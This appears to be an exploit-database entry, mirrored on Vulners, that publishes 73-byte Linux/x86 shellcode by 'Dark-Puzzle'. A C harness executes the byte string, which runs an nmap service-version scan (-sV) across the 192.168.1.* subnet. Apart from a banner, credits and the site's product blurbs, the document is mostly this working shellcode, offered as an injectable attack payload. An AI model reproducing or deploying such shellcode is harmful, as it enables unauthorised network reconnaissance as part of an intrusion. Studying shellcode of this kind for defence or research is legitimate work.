Lucene search
K

linux/x86 - Nmap Default Router Services Scan - 73 bytes

🗓️ 15 Sep 2012 00:00:00Reported by Dark-PuzzleType 
zdt
 zdt
🔗 0day.today👁 12 Views

Linux/x86 - Nmap Default Router Services Scan - 73 bytes. Shellcode By DarkPuzzl

Code
/*
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0      _                   __           __       __                      1
# 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
# 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
# 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
# 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
# 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
# 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
# 1                   \ \____/ >> Exploit database separated by exploit    0
# 0                    \/___/          type (local, remote, DoS, etc.)     1
# 1                                                                        1
# 0   [x] Official Website: http://www.1337day.com                         0
# 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
# 0                                                                        0
# 1               ==========================================               1
# 0                   I'm Dark-Puzzle From Inj3ct0r TEAM                   0
# 0                                                                        1
# 1                       dark-puzzle[at]live[at]fr                        0
# 0               ==========================================               1
# 1                              White Hat                                 1
# 0                         Independant Pentester                          0
# 1                      exploit coder/bug researcher                      0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
Shellcode By DarkPuzzle 
Title  : Linux/x86 - Nmap Default Router Services Scan - 73 bytes . 
Author : Dark-Puzzle (Souhail Hammou)
Platform : Linux/x86
Gr33tz to : Inj3ct0rs Team - SecurityFocus - PacketstormSecurity - Exploit-db .
*/

char darkcode[] = "\x31\xc0\x50\x68\x6e\x6d\x61\x70\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x68\x6f\x63\x61\x6c\x68\x2f\x2f\x2f\x6c\x68\x2f\x75\x73\x72\x89\xe3\x50\x68\x2d\x73\x56\x56\x89\xe1\x50\x68\x31\x2e\x31\x2a\x68\x31\x36\x38\x2e\x68\x31\x39\x32\x2e\x89\xe6\x50\x56\x51\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
int main (int argc, char **argv)
{
	int (*dark) ();
	dark = (int (*) ()) darkcode;
	(int) (*dark) ();

}

/** Datasec Team **/


Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation